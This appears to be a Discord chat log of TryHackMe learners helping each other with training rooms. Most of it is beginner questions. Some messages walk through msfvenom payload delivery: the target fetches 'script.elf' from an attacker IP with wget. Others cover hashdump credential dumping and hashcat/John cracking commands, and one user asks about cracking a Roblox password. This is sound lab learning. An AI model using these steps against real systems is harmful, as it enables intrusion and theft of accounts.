i suck at networking . most of it really just went over my head. any tips?
im done with pre security just few more tasks left
what room should i go for next ?
goal is to go to blue team and be a cybersecurity engineer
You can follow this path if you want to pursue a SOC career
https://tryhackme.com/path/outline/soclevel1
Also check out #soc-level-1-path channel for more info π
thx i'll definitely check it out π
Just finish pre-sec and moving unto Cyber Sec 101, see you guys there π
Great job , keep up the good work π π
What did i miss?
I started the http.server through python and opened a new terminal tab, but it refuses to connect?
Linux Fundamentals Part 3 Task 4
You need to connect to target via ssh and start server on it not on your AttackBox
Thank you so much!! : )
Also thank you for taking the time and helping me and others here with the first steps in cybersecurity,i really appreciate it.
With that iΒ΄m done with the pre-security-pathway. : )
Gave +1 Rep to @supple nexus (current: #1 - 5927)
I finished pre-security so if someone needs help with anything feel free to ask me, I would like to help π
do anyone of you guys have free learning path as into jr pentester till redteam?;-;
Yeah , check it out π

Does anyone have any advices to getting cybersecurity internships in the UK? How much would these Tryhackme certificates help with it?
You might get some good answers on that topic in #cyber-and-careers π
Oh right thank you π
hello
I am stuck on PreSecurity https://tryhackme.com/room/windowsfundamentals1xbx "What is the name of the other user account?" I cannot find this anywhere... I tried Administrator,Default Account,Guest, WDAGUutility.. and nothing seems to get me past this. Please help!
run the "run" comamnd as shown in the image, then type "lusrmgr.msc", you will find it there, happy hacking : )
This is where I am stuck. Thank you all very much for the support!!!
Gave +1 Rep to @limber otter (current: #3157 - 1)
Maybe the second last one? So the Shaun.Kougioulis one?
For me it was a other name, try both versions so "Shaun.Kougioulis" and "Shaun Kougioulis".
If itΒ΄s not that, did you followed all steps or did you only read through it? : )
something is wrong with your target VM: you should not have that Shaun Kougioulis account, unless somebody (you?) created it
I suggest you do not waste your time: terminate your instance and start a new one, hoping you have a cleaner environment
Shy1 just mentioned that something might be wrong with your VM, you must do this task on the VM given there, i think you use your own windows pc(not sure though), this might be the error?
Yeah, this is me. However, I do not remember creating it, but I have had several Techs helping me with support. If I delete this, is there an risk of losing data or needed program files? Lastly, shouldn't there still be the other account needed to answer the question in the last photo that I posted? Thanks again.
Gave +1 Rep to @olive ether (current: #13 - 813)
I did try Shaun Kougioulis, but it is 1 character long than the question if the last photo" What is the name of the other user account?"
Thanks. What is VM? i did have A few techs help me with my pc, or maybe I created it, IDK. What should the user be here by default?
Gave +1 Rep to @olive ether (current: #13 - 814)
Thanks. I am unsure if it is an error. Yeah, I am using my own windows PC. Am I supposed to be using the machine in the program? IF so, I was unable to find the start button to get to the "run," command
Gave +1 Rep to @limber otter (current: #2076 - 2)
If I am supposed to use the machine within the program, I believe this is linux. Should this be Windows?
Make sure you have chosen the windows machine as shown in the image:
Thank you! however, I do not see the option for windows. I installed VPN GUI, but still not windows... This is frustrating!!
Gave +1 Rep to @limber otter (current: #1569 - 3)
I am catching up with earlier messages
it could be like Redoks hinted at you are not using THM target VM for this task
[VM stands for Virtual Machine]
check the screenshots showing the steps to get the target VM up and running
also, if you are new to THM, spend some time getting familiar with THM environment, as per this past message: #site-support message
Click green start machine button in task 1
Not sure why but I don't have the option of A windows machine. It directs me to install A VPN and upload A file, which I did, but still no option for the Windows Machine.
Can you make a screenshot of the first page of Task1 "Introduction to Windows" what you see there?
What is the THM? When I open the attack box it only offers me Linux or to install VPN and download the file, Which I did, but it is still not showing A windows machine. Sorry to seam difficult.
This is the firs option after resume learning
I started the machine right after... I showed Windows!! TY! Do you think this would stay on windows throughout? I really appreciate you help, THANK YOU SO MCUH!!!
The machine will stay 2h, after that it will get automatically terminated (if you dont do it beforehand)
When you are done with the whole task, make sure to terminate it and open the one shown in the next learning session. (ex. the one in Windows Fundementals 2) as also always mentioned there.
Note: THM is the short version of "TryHackMe",so the website you are on, happy hacking : )
Hi guys,
I'm new here and I need some direction or guidance on my journey in cybersecurity.
My goal is to join the grey team and become an ethical hacker.
Hi and welcome
maybe have a look at THM roadmap here: https://tryhackme.com/hacktivities
hey all, im on part3 for learning linux and im trying to log into my ssh and its saying my ip is "machine_ip" i type all that in and saying invalid.
i do wanna confirm if im typing it in right i do " ssh tryhackme@MACHINE_IP
am i missing something because now looking at it, it seems like i am
nvm guys appaerntly i didnt properly open my machine
my machine wants to take its time lmao
well i got it but idk the password
help needed
i could be having a brain fart
Username and password should both be tryhackme
that worked thank you so much!!!
Gave +1 Rep to @kind ember (current: #567 - 12)
Happy hacking π
sorry again poeple. can someone help explain and help me out here
wait
nvm
actully no i need help
HELP!!!!!
@kind ember u seem like a smart person. are you able ro help me out here?
okok ik "hacking" and ctfs are all trial and error till you get what ur looking for but im genuianly boutta crash out
like what does it mean deployed instance
deployed instance is another word for the target machine you started
and how would i find that?
im trying to read threw. i have really bad comprehension
ive been googling and using ai and cant find anything that guides me to my answer
you still need to be using ssh to the target machine, are you doing that?
what you want to do is ssh to the target machine, then run a command to see the running cronjobs
so run crontab -e
im on that
can you send screenshot of what you see?
yes yes
dont mind the left side of my screen i thought i had to backtrack. i could very also be making this harder on myself and not realizing
so the first part of the line beneath the blue text is the crontab
ohhhhh
or no, the whole line is the crontab, but the first part is when it will run
it can be a day, an hour, or...
right
so do i make it my own?
or do i go by the question?
but it just says" When will the crontab on the deployed instance (10.201.79.64) run?" like im looking for something
and is that becuase thats the default setting?
I guess default is just no crontabs at all, but at this deployed instance they have added a crontab
your actully a smart fuckinh person. @kind ember i do really apprisate you dont mind my spelling lmao. is there anyway i can promote you to anything or help you back? your a great person!!!!!
thank you so much for helping me!!!!
no problem, glad you got it working π
help needed
not sure if im doing this wrong or my machine isnt working
just keeps timing out
HELP
I have been stuck on this forever!!! "Note:if you click on ADD SOMEONE TO THIS PC from OTHER USERS, it will open LOCAL USERS and MANAGEMENT" I have no idea what this means. There clearly is not option here to add someone else. WTF? If I double-click users<New User I get the second image. I am totally baffled!
that ip is wrong
You are not supposed to add new accounts , just enter the name of the non-standard account in the answer box
OMG!! I finally got it!! Only took me 1-week! Here is the secret. After you click on users there is A list in the middle under (Full Name). Just run your cursor over the 4th one down. For example: The 4th one down on my list said "tryhackme..." but when I rand the cursor over it, without clicking, it gave me the answer ( tryhackmebilly). I sure hope this helps someone else.
Pls any course on cyber security in web3
Crypto ?
Yh
Currently no , only a few challenge rooms but no walkthroughs π
I know this issue is most likely for support, but nobody is responding there. When I am trying to type in to the VM I hear A dinging sound, and not test appears. I tried to ask, Echo, but that same issue there. Thanks everyone.
Where are we supposed input these commands? Command Prompt?
you launch System Configuration as per the beginning of Task 2:
There are several methods to launch System Configuration. One method is from the Start Menu.
Hi guys I've encountered a problem with the windows fundamentals room. Whenever I load up the VM the 'paste' box keeps coming up every time I left click. I was wondering if anyone has had similar issues and knows any fixes? I've tried restarting the box but problem keeps happening ππ
Try to use Ctrl+Shift+Alt for clipboard
Hello folks

.
Hey everybody! I'm almost done with the networking fundementals section and I'm starting to worry i'm going to get stuck soon becuase i'm moving pretty quickly. I'm wondering if I will need to stop today to try to memorize what i've learned so far. Thoughts?
I'm taking notes in notion but ultimately will need to make flashcards. I have Anki for flashcards.
Also I was trying to close a new connection I made with IP 8.8.8.8 to port 1234 in nc (Netcat) and couldn't figure it out.
I am having A very difficult time with Windows fundamentals 2! I am on task 3 and really have no idea how find these commands. I do now want to cheat myself and just google the answer, but I don't know where to even begin looking.
check screenshot
Ok bro give me feedback here thank u
great it worked on my machine perfectly
but there's a small problem
so i opened an issue in your repo
Okay first i appreciated that u tell me the issues because if u don't i will never improve more ...
I have already started with making flashcards in Anki. Correction: I changed this to Notion since it is easier to work with.
π
Hey guys, I need some guidance on where to start with cybersecurity.
Iβve learned web dev (HTML, CSS, JS, Laravel) and some Java (up to sorting/searching), but Iβm not sure how to take the first step into cybersec. Any tips?
You can start here π
https://tryhackme.com/resources/blog/free_path
Thanks for the info. However, I am not fining the commands through A prompt, just searching form the startup. Where am I supposed to find the commands? I keep seeing similar questions asking for commands and I find myself either asking here or google. Dont feel I am learning anything, Thanks.
Gave +1 Rep to @olive ether (current: #10 - 909)
Windows fundamentals 2 Commands. I have encountered many questions asking "What is the command to open..?" However, I am not seeing any commands, I am only searching the windows. When I ask echo, it says "it looks like you haven't taken any actions yet." Makes me think I am not using the program correctly. Please advise, Thanks.
let's highlight a few points for Task 3:
- Task 3 is about UAC
- UAC stands for User Account Control
- Q1 for Task 3 is about User Account Control settings
suggestion: - investigate the Tools "available through the "System Configuration panel" as per my previous message
- hence:
- launch "System Configuration panel"
- do "reconnaissance" of "System Configuration panel" by browsing throug all the tabs
- concentrate on what relates to Tools, and then concentrate on what relates to UAC to find the command expected by THM
if you need further guidance:
- unblur the attached screenshot
- ask Echo (THM AI assistant)
- look up some writeups, or better watch a video for the room
- writeups are usually brief, but often do not provide lots of explanations
- I like videos of users going through a room un-rehearsed, as you see where the diffiulties are and how they troubleshoot them:
- on the plus sign, I find it a rich learning exercise
- these un-rehearsed videos have the disadvantage of being long (like 1+ hour), so you may want to jump backward/forward at times
finally: there is nothing wrong with googling or checking writeups/videos:
- searching for information is a skill, and it is good to practice it and improve on it And BTW, do not discard searching with AI, like THM Echo or ChatGPT-like AI assitants By searching I do not mean passing THM questions to Google or ChatGPT, I mean phrasing a question the same way you are asking yourself how to solve a challenge
- you may see learning as asking questions and finding answers: some of them are in THM text, or in your head. or in the internet
- do not get bogged down by discarding particular help, try to find some balance so that you keep learning and moving forward π
Need help with the Active Directory room on task 4. After I input the power shell code for Sophieβs password reset when i go on to try to reset the password it keeps saying i need to reset the password before logging in hence I canβt get the flag i need to pass that particular question
have you implemented the delegation part of the task?
I need to know if it's possible to crack a Roblox password using John the Ripper.

Iβm going through this path for fun just to check it out. Most of the content is fine, but the windows fundamentals 2 room is kind of outdated, the malwarebytes blog link was dead, and some of the questions are really boring/repetitive. I feel like this room is in need of an update and polish. I mean no disrespect, this is just my honest feedback.
You can report outdated links in #1333993673381253162 channel
This is not a thing to worry about because everyone comes with a different perspective so what I zoom thru you may get stuck on for a week & what you zoom thru I will be tearing my hair out over - so just keep taking those notes & try to keep them organized with good command examples (make it obvious maybe some bright color) what parts are the parts that you need to fill in for each case (IP addresses, file names, etc). Believe me - you THINK you will remember now but 20 rooms on - you won't!! π & 100 rooms from now - not a chance!
actually i shold start organising the commands
i am in intermediate level but still cant use the basic cut command
Hi. Today I completed the Pre Security course.π

Hi. Today I completed the Pre Security course.
just started cyber security 101
howmuch time devoite to complete pre security course ?
2 days if u r dedicated
It depends on how fast you absorb knowledge and your background. Don't get pressured by following others' pace.
Thanx man π
I just finished the pre cyber course in like 3 days, you can learn good stuff in it
Hello all , please I found out my nickname was used on the batches I earned after each completion of each module . Will same be used for certificate of completion and other certifications or Iβll have to provide my real name for those certifications
my certs of completion print my real name, don't know if you can change that
For which purpose are you using it for though? If I remember correctly, you can drop an email to THM Support and they could assist with updating those.
Thanks so muchβ¦I have had a way around it

a website similar to pastebin but on the dark web, you can find it with one of the strings they posted in a picture, you can use wigle to determine BSSID after
Hi! I'm not sure if this is the right place for this question....
I am on Cyber Security 101 >Networking > Wireshark: The Basics
I am finding that the hint button doesn't work anymore.
I have tried different browsers, incognito mode, disabling extensions, enabling pop ups in THM, closing the attack box, etc, but nothing has worked.
Any suggestions please?
Hi everyone! I have some doubts about windows fundamentals. I can't find the right answers for the desktop Section. Any suggestion?
im learning linux rn
maybe check the official ms learn docs for that part, the desktop sectionβs wording there is way clearer than in the quiz
Thatβs been happening lately, prob a thm bug. try restarting the room or just wait it out, it fixes itself sometime
Try Chatgpt buddy
@river fog Keep researching, use the AI models, and try to find answers you do not have to know everything all at once. Just try to understand how much ever you can. And then again come back to the same topic and try to connect the dots. That's how you learn.
Hello good people. I was done with pre-security yesterday now until cyber-security 101. Active Directory
what did you think of the windows fundamentals section?
How am I supposed to submit the answer? I know that the answer is 5 AM on Monday.

Hello, i am new to cybersecurity course, currently on "pre security > network fundamentals > extending your network."
Can someone help me i cant access web vm. disabled everything on browser, clear dns etc. still cant access, just loading white screen.
https://tryhackme.com/room/extendingyournetwork
HI,can i do windows fundamentals before linux?
Restart VM, doesnt load allways.
You can. Just join the rooms for them.
hey I am having trouble with the script. task 6. https://tryhackme.com/room/linuxshells
when i run the script. it's not finding what it needs.
nevermind. i figure it out.
Just finished the first module, about to start module 2
To hold myself accountable Iβll share my progress here everyday
see if you can beat my streaks
π€ imma work towards it
Hello can someone help please? target machine keeps shutting down after few minutes of starting. I tried restarting page multiple times before it shuts down didnt help, extending time didnt work either since target vm started only few minutes and not allow to extend till you have 1 hour left. this happened multiple times and in different rooms.
this is happening in pre security and cyber sec 101 paths.
maybe it is your network connection , and the target machine detect this as you are idle
thanks for your reply. i'm active on the page and been working on the target vm in split screen. also tried open it in seperate tab and didnt work as well.

does anyone feel like the questions are too vague sometimes?
like this one for example.
DAY 2: LEARNED ABOUT NETWORKING FUNDAMENTALS
I wasn't able to finish the room since I had a busy day, but that's no excuse; I'll get back on it tomorrow.
BTW ive been trying to add an image into this channel, but i cant for some reason, any reasons why?
like screenshot?
ive been trying to add any type of image, but it just wont allow me, its probably a system setting i have to configure,
i don tknow... admins could set it that way until you confirmed who you are.
i didn't need to configure any setting just to paste snippet
Hi! I finished the pre-security path today. I don't have a computer science background and I feel like I don't have a solid grasp on Network fundamentals and how the web works. Are these topic will come up again in other modules and paths? Do I have to trust the path of THM or do I need to read about these before continuing? Like... I wish I'd had an exam on these topics to confirm if I understood correctly, because I'm not sure.
Thanks Iβll look into it
Gave +1 Rep to @austere solar (current: #3252 - 1)
I'd say it will help to have a good understanding of networking and web, it will make it easier. But the paths are also tailored to address the fact that many start with a non-technical/IT background.
I encourage you to continue, and if you notice that something is suddenly waaay over your head you can study that topic a bit more in-depth π
hey I am trying understand this part
-i INTERFACE is this flag referencing to the ip command or something else?
because i tried using ip -i eth0 and its doesn't work
nevermind again... its for tcpdump. haha
Day 3: Still on Module 2: Network Fundamentals Lesson 1/Room 1: What is Networking?
im currently on if you need any helps
is there a way to link your try hack me accountant to discord? (I just started)

@tacit chasm Please slow down β spam isnβt allowed.
@tough salmon Please slow down β spam isnβt allowed.
Been extremely busy these past few days, but havent broken my streak @austere solar im still in the race
BTW, have any of you started a challenge yet? If so, do you Google your way out or is it all of the top of your head?
i tried one challenge and gave up and go back to the lessons.
i will most likely start those challenges after i complete cybersecurity 101
i was thinking the same idea, for now, ill just absorb as much knowledge a i can
my knowledge definitely improved after going through a few lessons that i wasn't too knowledgeable or have trouble understand. like tcpdump, wireshark, and nmap. my linux improved along the way as well.
it would be better if you discuss whatever you are studying or practicing with someone doing the same path, grow along the way
maybe we should ask the thm to make three new channels, blue teem, red teem, and purple team. this way it helps the discussions and practices.
that would be good for starting
just sharing know how or clues or even what to do when you are taking a path
Who is doing Linux fundamentals? I need a sturdy partner, see if 6 months later we are bigger fish here
i can help you with linux but im already ahead
Day 8: I'm still on network fundamentals, working on the OSI model room. I spent the bulk of my time trying to wrap my head around subnetting and how to partition devices on a network into separate networks.
Pre Security: 21%
What pathway are you on at the moment?
Have you chosen your specialty?
i'm leading torward pentesting for bug bounty. then soc and last security engineer.
how about you @minor niche
nice, after finishing the pre security and the cyber security 101 im looking towrdas the blue team side security analyst
true
Honestly my goal is to get that sal1 cert and focus on projects/challenges to put towards my resume
the job market is stuff and i hope we all make it through
oh!? im currently going back to college to finish my degree in Cyber
so, im doing this in the meantime while i wait for my transcripts to be aprove.
im using thm to re-enforce my knowledge and experiences.
Great move tryhackme helps a lot

what's your current stat for thm/career?
Currently in Race conditions
an acquaintance of mine recommend thm for knowledge if i wanted to get into sysadmin
great! why INE ejpt? i was doing some research to compare certs
thats nice, good use of your time as well
Im currently in college doing computer science, and taking on thm lessons on the side
yeah, my current position doesn't really have me do much at work.
word! i got computer science A.S.
hopefully everything goes to plan
π
Speaking of which, I really gotta get back to learning. School's been my excuse away from it.
I did complete the part 1
part 2 ,3 requires cash, so its pending, unless there is some subscription
How to copy link download in tryhackme??
i try to download file form website to attack box use wget but i cant get the file link
did you tried typing the whole link?
Having issues in the how websites work room. I copied and pasted the code given to me, and it still errors. It will not fix itself or work.
tryhackme does have a subscription
what was the code you copy pasted? did you get it to work yet?
Still not working. Iβll send it once I get back online
sure, yea it sucks cloudflare shut everything off π
Iβm about to head to my last college class of the day so Iβll send it after it over
good luck
anyone available to give me some advises for password cracking?
Hey ! Don't know if I could help but we could see, as I've seen your are on the cryptography basics course, is it with john the ripper you need help ?
nah, its the password cracking before the john the ripper
thank you for reaching out
hashing basics ?
hashcat
sorry, yes it it the hashing basic haha
so, the hint was use online service
I see, what would you need help with ? Done that course yesterday so it would train me well if I could help you
Yeah, I had some troubles with it as well if I remember well
so, I understand how to use the hashcat command.
how do I identify the hash ID if there is no prefixes.
how do you go about trying to solve this problem
I think it is done on purpose to make us look and search on the internet
i tried avoiding using the hint if i can because im stubborn like that
yeah I remember Hashcat couldn't solve it
I like to you this tool https://www.tunnelsup.com/hash-analyzer/ to indentify the hash
i discover that tool like 10 minutes ago
Try this one
Crackstation is the most effective hash cracking service. We crack: MD5, SHA1, SHA2, WPA, and much more...
It gives you the answer
yeah, i used that one to find my answer haha
But I can't figure why hashcat doesn't do the job on that one :/
its funny because if we can identify the hash ID. why can't we crack the hash
As I said, I think it is made to make us think and search, if I remember well, somewhere in the room, they tell us "We advise you look for the available ressources on the internet" or something like that in one of the chapters of this room
You will see that in the next room π
John the Ripper was pretty fun eventually
im definitely tagging you if i need help haha
if you don't respond within 30 to an hour. i will probably found my answer haha
Haha don't worry, when begining with cryptography I understood NOTHING (I am very, very, very, veeeery bad at maths), there was too much mathematics concepts explained haha
the diffie-hille ones got me
Well depending on where you live, I will or I will not be available at that time haha
The whole maths got me no worries
Glad I could, always a pleasure to share my experience when I can
But yeah, no maths for me and everything should go as planned
@buoyant gazelle officially on john the ripper course
Have fun dude
It's not that difficult you'll see
thanks
yeah bro, its been a busy week for me but i am staying strong
I havent done anything today, but ill try to get some stuff in later
one task per day will keep you going.
same... i have been exhausted with covering shifts for co workers.
my sleep is all jacked
I try to remind myself, times like these are ultimately what build the future we want. The sacrfices, late nights, hard concepts that make you rethink your choices, etc, all build up to that life we all dream of.
@buoyant gazelle i need your assistant haha
its john the ripper
in task 7 of john the ripper: the basic, its talks about single cracking mode.
What can I help you with ?
Okay, so here's the explanation : it is explained in the task that if you can do a word mangling, so by knowing the username (Poltergeist for example) you can tell John to do a word mangling, so he'll try replacing the E with 3 etc
i understand the mangling
Knowing that, what you can do is attributing the hash of the password found in the Task 7 directory to the user Joker
So you can do the command cat file.txt
what i am not getting is when i typed the command john --single --format=xxx -wordlist=xxxx
Copy the hash that it gives you
its not producing it
And then you can do echo "Joker:hash_found_in_file" > file.txt
ahhh ok
Then you do the command john --single --format=hash_format -wordlist=xxxx
Haha always a pleasure π
16 day streak: Still on network fundamentals, but i am in the last room, i should finish it tommorow and start the web module
Youβre rocking it bro πͺπͺ
yo! why is Moniker link section vm is so whack out? its so hard to do anything.
this one its gonna be rough haha
Pre security -> 39%
Just finished the networking portion, learned alot, I am currently onto the web module, ill probably finish the presecurity by the end of the year
I honestly really enjoyed the network portion of the pre-security. I might think about learning more in-depth about networking once I've gotten my sal1 certification. I might do the Network+ + cert or the CCNA. But for right now, i dont want to move the goal post much, ill stick with this
same, i was thinking the same thing...
hey guys, I'm in the Windows Fundamentals Section and currently doing Windows Fundamental 2, and I'm at "At what time every day is the GoogleUpdateTaskMachineUA task configured to run?" and I did check Task Scheduler > GoogleUpdateTaskSystem > Triggers, but that's a wrong answer, why?
can you show the image?
Sure
I bumped into the same earlier and googled the answer because the value did not match at all π
yeah same, I just asked the AI Bot, I spent 30 minutes on this...π
@austere solar How are you doing my friend ? Everything is okay ?
i went back to check my answer and the went to go look for myself. that is not the answer i gotten last time. I wonder if they change it.
hey, im doing good. thanks for asking. how about yourself? i'm slowly making progess because of the holidays and overtime work i am receiving.
Gave +1 Rep to @buoyant gazelle (current: #3294 - 1)
Should I report this to any mod? Maybe it's an error?
yeah, because i know they make changes to some rooms. but i am not sure which one
i assume you got through it after googling the answer.
I'm doing fine thanks π Advancing room by room

Nice!!! Yeah, i need progress a bit more. I want to finish the cybersecurity before the end of the year.
You're doing the Cybersecurity 101 if I'm correct ?
im half way there... im on the metasploit.
That one's a huge piece but loved that part actually, really shows usefull tools and helps you visualize how vulnerabilities are exploited, less words, more practice haha
I'm at 74% of the pathway, it it a huge one
the introduction was a bit confusing. because they were showing meterpreter. and i didn't know how to access it. but i am on metasploit explotitation now.
Yeah I remember being confused at this moment as well :/
have you used any of the tools since started?
No but I am following, in addition of TryHackMe, a cursus of 8 months that would give me the certification to be a SOC analyst so I will see it through my cursus, I am just preparing myself for this moment, and you ?
no, but i am thinking of using wireshark. add that to make skills
Wireshark seems fun as well as per the few modules I've done on it, looking forward to going further into it, but it is not for the same pupose as Metasploit/Meterpreter
Hi guys, I will be starting my pre-security-pathway today and I hope I enjoy it and that everything goes well
@buoyant gazelle i think i am having a little trouble with metasploit
What is the problem ?
did you use portscan?
nevermind... the vm was bugging and i didn't get the result or how i picture it would be
did you have an issue when using nmap to look for the netbios?
Yeah had a few issues with nmap
i didn't know how to use the cmd for it. have to look it up
if someone morrocan here
@buoyant gazelle i dont seem to understand how to get meterpreter
Hey ! Sorry it was 4:38am when you sent the message so I was sleeping haha
Meterpreter is in the Metasploit framework, you have to use the correct exploit, and once it is done correctly, you will be able to use meterpreter on the target system
Btw, I finished the path Cybersecurity 101, I'm going on the soc lvl 1 path now
congrats!
no worries man... i shouldn't have been up late. i think i need more play around metasploit a bit more.
25-day streak -> On module 3 - How the Web works
I'm also participating in the Advent of cyber, hopefully itll introduce me into getting comfortable with challenges and ease me into it
good luck man...
Thanks man
Gave +1 Rep to @austere solar (current: #1318 - 4)
Have fun !
Same here ... still not fixed I guess.
I'm stuck at this same point, any luck on your end?
go upload this shit on other place
Tell me everything
when i am setting up my payload it is on the machine i am useing to attack. correct?
which also include the encoder
and the handler is what i use on machine that I ssh into, correct?
this is the part that i am confused about
Gimme a minute to check the module so that it's clear in my mind
no worries
I just had a whole day doing CTFs at my school so my brain is a bit mixed up haha
nice
Okay I seem to remember a bit
So for msfvenom to work correctly, you gotta create your payload that comes from meterpreter and send it on the target machine
LHOST = <your ip>
And once you send your whole payload with msfvenom, you then have to wget it from http://<attacker_IP>:9000/script.elf
Forgot to mention you have to run a local python3 server listening on port 9000
ok
wget have to be loaded to the victim machine?
The script you use wget for yes
So on targeted machine don't forget to chmod it
my handler and is not catching the .elf
@buoyant gazelle hey i dont understand this part
Use a post exploitation module to dump hashes of other users on the system.
Iβm waiting until this Friday to get the subscription for THM. In the meantime, does anyone recommend or have any resources they could share to me for me to learn more about the Network/Lan or the Lenox modules that are in the pre-security section?
You gotta use meterpreter on targeted device
im on the the meterpreter
The pst exploit module to use is called hashdump
right, am i using it on the meterpreter? or msfconsole?
So background the meterpreter session and search for the hashdump module
thank you so much!!!
My pleasure mate π
if we ever meet, i owe you a beer haha
As a belgian, that is an offer I cannot refuse haha
well looks like Belgium is on my list of travel to go to haha
I'll welcome you with great pleasure π
Iβm waiting until this Friday to get the subscription for THM. In the meantime, does anyone recommend or have any resources they could share to me for me to learn more about the Network/Lan or the Lenox modules that are in the pre-security section?
try not to spam the same thing over if no one get to you. there other rooms as well you get someone to answer your questions.
you can always youtube.
i dont have any resources to give you other then what i have on youtube if you want that. as fo lenox modules. don't have that
I understand. I didnβt realize I had shared it in this room already. My apologies.
yeah, i saw it earlier and forgot about it
If you could DM your resources you do have I would appreciate it. Thank you.

Hey guy! Proud to announce I finished the Pre Security pathway today. π₯³ π₯³
π
Hey guys i am new here can i also get certs here?
You have to pay for the exam to get the cert
so i can learn here and do the exam elsewhere?
, windows fundamentals 2, task 4, "At what time every day is the GoogleUpdateTaskMachineUA task configured to run?", can't find it on the machine, also tried the answer i found online and in the the discord here and it says it's wrong, maybe i'm crazy
After reading the medium writeup and using chat bots i got the answer 6:15Am but still itβs not working
Kindly fix the issue
sure, each exams is base off of what you know and learned. thm and htb are practicals exams.
hey did you tried the one on the googleupdate?
someone else had the same issue.
Yes
are you still having an issue?
Yes itβs havenβt been patched yet
After giving the correct answer also itβs showing error or wrong wrong
so 6:15 am and 5:15 am doesn't work?
I tried 6.15AM only
what's the one on the googleupdatetask say?
Should i try 5.15 am also ?
you should do the one that is in task 2
In the machine that type of file doesnβt even exists
let me check if you wanna hop on i can run it through with you
Yes sure
small room
I have sent you the img check that
You can clearly see itβs website or THM room bug
@boreal python you good?
Yess
ok, did you tried the time i screenshot for you
I'm having the same issue, i don't see that named task and the only scheduled task i see for google scheduled for 5:44 am and that doesn't work
oh okey ty very much
Gave +1 Rep to @austere solar (current: #1133 - 5)
SAMEEEE
5:44am doesnt work, 6:15am as wel
@gusty aspen you two still need the answer? i can give you it as long you guys know how what compmgmt does
yes, i know how compmgmt does
Did u check it as well? I really cant find that task
I saw a walkthrough online for that particular level, that only, and i saw how easy they were able to find that task in the task scheduler linrary
i completed it awhioe ago.
since they did something to it my answer changed
Was it fine for u?
Can u check mumbai server
Im from ph and the machine was in mumbai server
they definitely did change the answer but did not correct the one in the vm
here', tried this time - 8:44 am
Thank you!
did it work?
no,
i sent that in the email to the support to let them know that issue
that was from yesterday
i just log into the same task 4 and here what i got:
good luck with the rest of the lessons.
Yeah, we got the same
@inland bone i hope you see this so you can continue
mb, i just read #rules
Thanks
Yup
what the fuck!?
yes
yeah, they definitely need to fix that issue
thanks
no problem man! hope to see you catch up to me or surpass me
lucky!
yessir
Got question. Stuck on a module. Extending Your Network, the very last module that simulates a network. Iβm getting the flag and the website isnβt liking my answerβ¦
Hey ! I can try helping you. I have the exercise right here in front of me. May be you could DM me the flag that you have gotten ? So that you don't give the answer in front of everybody π
Just DMβed you.
what's up?
the structure of coding in javascript shouldn't any different from python, java, c++
hey if anyone wants to join in large study room. welcome!
@austere solar may i ask how does the levelling in the discord server works
like the 0x something
btw, i just finished pre-security, what can you suggest i take for SOC
I think its just being active i. Discord. And for the thm. Its keep doing the lessons and earning badges.
I think
Ii think maybe you were just looking at the next run time or last run time, but the real answer is in the trigger, which is set to Daily. Thatβs why the answer is 5:44 AM
hey i checked and if you looks beyond that screenshot. you willl see two different ones. and they did it correctly.
@buoyant gazelle its over for me... i am done with metasploit and now on the blue
Good luck for this one !
did you do your metasploit on your own vm or use the one from the site
With my own VM as I remember
Hey all! I have just completed my third day in a row of pre-security and thought I'd pop in and say hi. I don't have any background experience in anything related to cyber security/hacking, so this is all very new to me (and a little intimidating). Pentesting seems like an avenue I want to explore more, but do not want to get ahead of myself lol. Is there any insight/advise that anyone can give me for entry level projects or experiments I can do to help me learn some skills that I can do on my own time? I have already dipped my toes in a VM but don't really know too much about what I can do with it. Might be getting over my head with this too, but if there's anything, I am eager to know!
start learning linux and network, that would be my advices for yu
experiments = have two VMs open and see if you can ssh and rdp and how to setup a server.
What in the wide world is ssh and rdp
Never mind I figured it out. Thanks a ton for your insight!
Nope
In the Linux Fundemantals Part 2, I'm struggling getting logged into the terminal using the credentials the lesson is telling me to do so.
Not sure where I'm messing up at.
Nvm. Misread which IP to ues.
I would also add to the good advices from @austere solar that it is better for your learning to really take time to read and search for any term or abreviation you do not know, Google is a very good friend when practising THM π
And if you are stuck on a task, prefer reading the whole task once more and search by yourself instead of getting the answer on some website π
he's talking about trying to remote access into a machine hence "RDP" (Remote Desktop Protocol)
Iβm proud that Iβve finished the pre-security pathway yahooo!
same here
@austere solar my guy, can i ask for help
whats up?
if i dont respond back. im in bed
its about the active directory, i used the command for the changepasswordatlogon for sophie, i cant change my password on logon, i had to manually set it up using ps
i want to try the "changepasswordatlogon"
did it work for sophie?
did you check you typed correctly
yes yes
the manual one only worked for sophie
but the changepasswordatlogon, did not
test
if you still have some issue. we can hop on chat and see the issue.
@gusty aspen how did you make out? were you able to complete it?
hello, sadly no, i just let it go
maybe in the real world it would work
if you have time, we can go throught it together and maybe we can resolve the issue.
you can also test it on a VMs
Pls guy must I subscribe to get access to the introduction to networking cause I am confused now
Are you not subscriber?
Yes am not
Yeah, you need to be subscription if you want to continue.
The first three courses are free.
Ahhhπ
Okay thanks
I am attempting to do the Linux fundamentals part 2. SSH from attackbox to target machine is not working. It just times out. Any suggestions?
did you tried restarting the target machine?
@austere solar Yeah, that's what I had to do to make it work
you will encounter that through some of the lessons.
just a heads up
Thanks. Seems like there are a lot of bugs to deal with. The advent of Cyber has been pretty rough
Hows it going everyone
Im at day 34
ngl i did use my freeze streak, but im still in the game
hello guys
anyone with Trend Vision One idea? I'll really appreciate if you can be of help thank you
Yo everyone! Finished the pre security pathway a couple days ago and successfully ran my first nmap & ssh on two Kali VMβs in a host only network. Iβm currently lined up to start studying for my A+. Iβm looking to get more involved in projects/labs and would love to know more about GitHub. Iβm hearing itβs a good tool to use for a resume, but would love to know more about it. Any advice is welcome!
anyone online that could help me?
what do you need help with?
i ned help try to cmd to crack the hash but seems i am doing something wrong
you do the same thing like first question.
from the look of it you did this: hashcat -m 3200 -a 0 hast2.txt ~/*****/****hast2.txt
which mean it is trying to hash the file hash2.txt which is not in your user home directory
when you hashcat it should be like this:
hashcat -m <hash id> -a <attack mode #> <hash file> <wordlist>
hash file should include the location of the file if you are not in the correct directory of the file.
@tacit locust you did everything correct until the hash file portion which is in correct as well as your -m is incorrect
if you look at the example above.
i hope this help if not, dm me. i can show you
if you remember reading this part $perfix$option$salt$hash
if there is no parameter before the hash. then it is just a hash. example: 9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1 which is a sha2-256
example: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG --> 2a is the prefix, 06 is option, 2a is a bcrypt
Oh yeah thank you I was able to fix it
